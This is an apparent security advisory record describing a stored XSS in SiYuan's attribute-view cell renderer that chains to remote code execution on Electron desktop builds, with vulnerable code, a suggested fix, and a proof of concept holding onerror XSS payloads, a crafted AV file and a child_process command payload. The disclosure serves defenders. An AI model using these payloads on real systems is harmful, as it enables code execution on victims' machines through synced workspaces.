{"id":"CVE-2026-54158","aliases":["GHSA-5xfx-xj4h-5p7r"],"title":"SiYuan: Stored XSS to RCE via attribute-view cell rendering in genAVValueHTML()","summary":"SiYuan: Stored XSS to RCE via attribute-view cell rendering in genAVValueHTML()","severity":"critical","cvss":9.9,"cwe":["CWE-79","CWE-1188"],"vendor":"siyuan-note","product":"github.com/siyuan-note/siyuan/kernel","ecosystem":"go","affected":["github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4"],"patched":["github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4"],"published":"2026-07-10","updated":"2026-07-10","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-5xfx-xj4h-5p7r","references":[{"url":"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-5xfx-xj4h-5p7r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54158"},{"url":"https://github.com/advisories/GHSA-5xfx-xj4h-5p7r"}],"tags":["ghsa","go"],"epss":0.00289,"epssPercentile":0.20761,"ingestedAt":"2026-07-10T20:06:10.675Z","slug":"CVE-2026-54158","body":"## Overview\n\n### Summary\n\nThe attribute-view (database) cell renderer `genAVValueHTML` interpolates cell content raw in four of its branches: `text`, `url`, `phone`, and `mAsset`. A cell value like `</textarea><img src=x onerror=\"...\">` or `\"><img src=x onerror=\"...\">` breaks out of its surrounding tag and runs arbitrary JavaScript in the renderer when the victim opens the block-attribute panel. On Electron desktop the renderer runs with `nodeIntegration:true`, so the XSS chains to host RCE via `require('child_process')`. AV files live under the workspace and ride normal sync, so an attacker with write access to any synced workspace plants the payload once and it fires on every device that opens a panel containing that row.\n\nThe kernel doesn't escape on the way in either, so the malicious cell persists byte-for-byte. There's no equivalent of the `html.EscapeAttrVal` call that protects block IAL attributes at `kernel/model/blockial.go:261`.\n\nCompanion advisory: GHSA-mvjr-vv3c-w4qv. Same workspace-sync to renderer-sink to Electron-RCE pattern in the CSS-snippet renderer, different sink file. Worth auditing for the same pattern in other renderers that pull from synced workspace data.\n\n### Details\n\nAffected:\n\n- HEAD `96dfe0b` (v3.6.5, 2026-04-21)\n- Renderer sink: `app/src/protyle/render/av/blockAttr.ts:68`, `genAVValueHTML()`. The text, url, phone, and mAsset branches interpolate cell content raw.\n- Callsites piping `genAVValueHTML` into `innerHTML`: `select.ts:124,229,346`, `cell.ts:791,913,1198`, `col.ts:455,656,1256`, `filter.ts:199,471,609,702`, `groups.ts:56,289,328,378`, and `blockAttr.ts:212`.\n- Source: cell values returned by `/api/av/getAttributeView`. Backing store: `data/storage/av/<avID>.json`.\n- Write path: `kernel/model/attribute_view.go`, `updateAttributeViewValue` and `(*Transaction).doUpdateAttrViewCell`. No call to `html.EscapeAttrVal`, `html.EscapeString`, or `util.EscapeHTML` anywhere in the file.\n- Electron config: `nodeIntegration:true`, `contextIsolation:false`, `webSecurity:false` on every `BrowserWindow` in `app/electron/main.js:307,408-411,1107-1110,1150-1153,1322`.\n\n#### The sink\n\n`app/src/protyle/render/av/blockAttr.ts:68`, with the unsafe branches highlighted:\n\n```ts\nexport const genAVValueHTML = (value: IAVCellValue) => {\n  let html = \"\";\n  switch (value.type) {\n    case \"block\":\n      // escaped via escapeAttr — safe\n      html = `<input ... value=\"${escapeAttr(value.block.content)}\" ...>`;\n      break;\n    case \"text\":\n      // value.text.content goes raw into a <textarea>\n      html = `<textarea ... rows=\"${(value.text?.content || \"\").split(\"\\n\").length}\" ...>${value.text?.content || \"\"}</textarea>`;\n      break;\n    case \"url\":\n      // value.url.content goes raw into value=\"...\" and href=\"...\"\n      html = `<input value=\"${value.url.content}\" ...>\n              <a ${value.url.content ? `href=\"${value.url.content}\"` : \"\"} ...>`;\n      break;\n    case \"phone\":\n      // same pattern as url\n      html = `<input value=\"${value.phone.content}\" ...>\n              <a ${value.phone.content ? `href=\"tel:${value.phone.content}\"` : \"\"} ...>`;\n      break;\n    case \"mAsset\":\n      value.mAsset?.forEach(item => {\n        if (item.type === \"image\") {\n          // item.content raw inside aria-label\n          html += `<img ... aria-label=\"${item.content}\" src=\"${getCompressURL(item.content)}\">`;\n        } else {\n          // attributes escaped, but ${item.name || item.content} text-node is raw\n          html += `<span ... aria-label=\"${escapeAttr(item.content)}\" data-name=\"${escapeAttr(item.name)}\" data-url=\"${escapeAttr(item.content)}\">${item.name || item.content}</span>`;\n        }\n      });\n      break;\n    // other cases use escapeHtml / escapeAttr correctly\n  }\n  return html;\n};\n```\n\n`escapeHtml` and `escapeAttr` already exist and are used in the `block`, `select`, and `mSelect` cases. They just aren't applied in the four branches above.\n\nCallers assign the result to `innerHTML`. Example, `app/src/protyle/render/av/select.ts:124`:\n\n```ts\nif (item.classList.contains(\"custom-attr__avvalue\")) {\n    item.innerHTML = genAVValueHTML(cellValue);\n}\n```\n\n#### The write path\n\nA grep for any HTML-escape call in `kernel/model/attribute_view.go` returns nothing:\n\n```\ngrep -n 'html.Escape\\|EscapeHTML\\|EscapeString' kernel/model/attribute_view.go\n# (no output)\n```\n\nFor comparison, the block-IAL write path at `kernel/model/blockial.go:261` applies `html.EscapeAttrVal(value)`. The AV cell write path is missing the equivalent.\n\n#### Storage and sync\n\nAV files live at `data/storage/av/<avID>.json` and the repository sync picks them up the same way it does the rest of the workspace data. Any sync target propagates the malicious cell to all peers.\n\n#### Suggested fix\n\nThe renderer-side fix is the more important one. `escapeHtml` and `escapeAttr` already exist in `blockAttr.ts` and already protect the `block`, `select`, and `mSelect` branches. Extend them to the rest of `genAVValueHTML`:\n\n```ts\ncase \"text\":\n  html = `<textarea ...>${escapeHtml(value.text?.content || \"\")}</textarea>`;\n  break;\ncase \"url\":\n  html = `<input value=\"${escapeAttr(value.url.content)}\" ...>\n          <a ${value.url.content ? `href=\"${escapeAttr(value.url.content)}\"` : \"\"} ...>`;\n  break;\ncase \"phone\":\n  html = `<input value=\"${escapeAttr(value.phone.content)}\" ...>\n          <a ${value.phone.content ? `href=\"tel:${escapeAttr(value.phone.content)}\"` : \"\"} ...>`;\n  break;\ncase \"mAsset\":\n  // escape item.name and item.content in the text-node positions, not just inside attributes\n```\n\nThe `mAsset` image branch also interpolates `item.content` into the `src` attribute via `getCompressURL`. Worth rejecting `javascript:` and `data:` schemes for asset URLs while you're in there.\n\nBackend side, defense in depth: in `kernel/model/attribute_view.go:updateAttributeViewValue`, call `html.EscapeAttrVal(content)` on the string-content cell types before persisting. This mirrors the existing protection in `kernel/model/blockial.go:261`. The renderer fix matters more because the backend fix doesn't retroactively neutralize payloads already sitting in synced workspaces.\n\n### PoC\n\nStand up SiYuan and drop a malicious AV file at `workspace/data/storage/av/poc.json`:\n\n```bash\ndocker run -d --name siyuan-poc \\\n  -v ./workspace:/siyuan/workspace \\\n  -p 16806:6806 \\\n  b3log/siyuan:latest \\\n  --workspace=/siyuan/workspace --accessAuthCode=hunter2\n```\n\nMinimum viable AV JSON:\n\n```json\n{\n  \"spec\": 2,\n  \"id\": \"20260519999999-poctest\",\n  \"name\": \"PocAV\",\n  \"keyValues\": [\n    {\n      \"key\": {\"id\": \"...keyblok\", \"name\": \"Block\", \"type\": \"block\"},\n      \"values\": [{\n        \"id\": \"...row1blk\", \"keyID\": \"...keyblok\", \"blockID\": \"...row1blk\",\n        \"type\": \"block\", \"isDetached\": true,\n        \"block\": {\"id\": \"...row1blk\", \"content\": \"Row 1\"}\n      }]\n    },\n    {\n      \"key\": {\"id\": \"...keytext\", \"name\": \"TextField\", \"type\": \"text\"},\n      \"values\": [{\n        \"id\": \"...celltxt\", \"keyID\": \"...keytext\", \"blockID\": \"...row1blk\",\n        \"type\": \"text\",\n        \"text\": {\"content\": \"</textarea><img src=x onerror=\\\"window.__siyuan_av_xss='FIRED'\\\">\"}\n      }]\n    },\n    {\n      \"key\": {\"id\": \"...keyurl0\", \"name\": \"UrlField\", \"type\": \"url\"},\n      \"values\": [{\n        \"id\": \"...cellurl\", \"keyID\": \"...keyurl0\", \"blockID\": \"...row1blk\",\n        \"type\": \"url\",\n        \"url\": {\"content\": \"\\\"><img src=x onerror=\\\"window.__siyuan_av_url_xss='FIRED'\\\">\"}\n      }]\n    }\n  ]\n}\n```\n\nIn a real attack the file gets there via sync, not by hand.\n\nConfirm the API returns the cell content raw:\n\n```bash\nTOKEN=$(jq -r '.api.token' workspace/conf/conf.json)\n\ncurl -s -X POST http://localhost:16806/api/av/getAttributeView \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -d '{\"id\":\"20260519999999-poctest\"}' \\\n  | python3 -m json.tool | grep -E '\"content\":'\n```\n\nOutput from my run on 2026-05-19:\n\n```\n\"content\": \"</textarea><img src=x onerror=\\\"window.__siyuan_av_xss='FIRED'\\\">\"\n\"content\": \"\\\"><img src=x onerror=\\\"window.__siyuan_av_url_xss='FIRED'\\\">\"\n```\n\n`</textarea>` and `\">` come back literal, no escape.\n\nIn the Siyuan renderer's DevTools:\n\n```js\nconst res = await fetch('/api/av/getAttributeView', {\n  method: 'POST',\n  headers: {'Content-Type': 'application/json'},\n  body: JSON.stringify({id: '20260519999999-poctest'})\n});\nconst json = await res.json();\n\nlet textValue = null, urlValue = null;\nfor (const kv of json.data.av.keyValues) {\n  for (const v of kv.values || []) {\n    if (v.type === 'text' && v.text) textValue = v;\n    if (v.type === 'url' && v.url) urlValue = v;\n  }\n}\n\n// Replay the actual genAVValueHTML branches verbatim.\nconst textHTML = `<textarea rows=\"${(textValue.text?.content||'').split('\\n').length}\">${textValue.text?.content || ''}</textarea>`;\nconst urlHTML  = `<input value=\"${urlValue.url.content}\">`;\n\nconst div = document.createElement('div');\ndiv.innerHTML = textHTML + urlHTML;\n\nawait new Promise(r => setTimeout(r, 250));\n\nconsole.log({\n  textMarkerFired: window.__siyuan_av_xss === 'FIRED',\n  urlMarkerFired: window.__siyuan_av_url_xss === 'FIRED',\n  imgsInDiv: div.querySelectorAll('img').length,\n  title: document.title\n});\n```\n\nOutput from my run:\n\n```json\n{\n  \"textMarkerFired\": true,\n  \"urlMarkerFired\": true,\n  \"imgsInDiv\": 3,\n  \"title\": \"AV_TEXT_XSS_OK\"\n}\n```\n\n`</textarea>` and `\">` both broke out, the smuggled `<img>` elements ran their `onerror` handlers, the marker variables got set, `document.title` got rewritten. Same code path the real panel takes when the user opens the block attributes on this row.\n\nTo turn it into RCE on Electron, swap the marker payload for:\n\n```html\n<img src=x onerror=\"require('child_process').execSync('open /Applications/Calculator.app')\">\n```\n\n`require` is reachable from the renderer because of `nodeIntegration:true` in `app/electron/main.js:408`.\n\n### Impact\n\nStored XSS to RCE on Electron desktop builds, plus XSS on mobile and Docker web builds.\n\nThe payload fires the next time the victim opens the block-attribute panel on a row containing the malicious cell. The panel opens on a cell click or via the gutter icon, which is normal database usage. No special interaction required.\n\nAnyone affected by a workspace-write compromise is exposed. Realistic paths in: compromised SiYuan Cloud / S3 / WebDAV sync credentials, a workspace folder mounted on a shared filesystem (Dropbox, Syncthing, network share, git), or a multi-user Docker server where any authenticated user can call `/api/av/updateAttrViewCell`. Once the malicious AV cell is in the workspace, every peer that syncs and opens a panel touching that row runs the payload.\n\n## Affected packages\n\n- `github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4`","depth":"midnight","depthScore":55,"depthScoreParts":{"impact":54.5,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}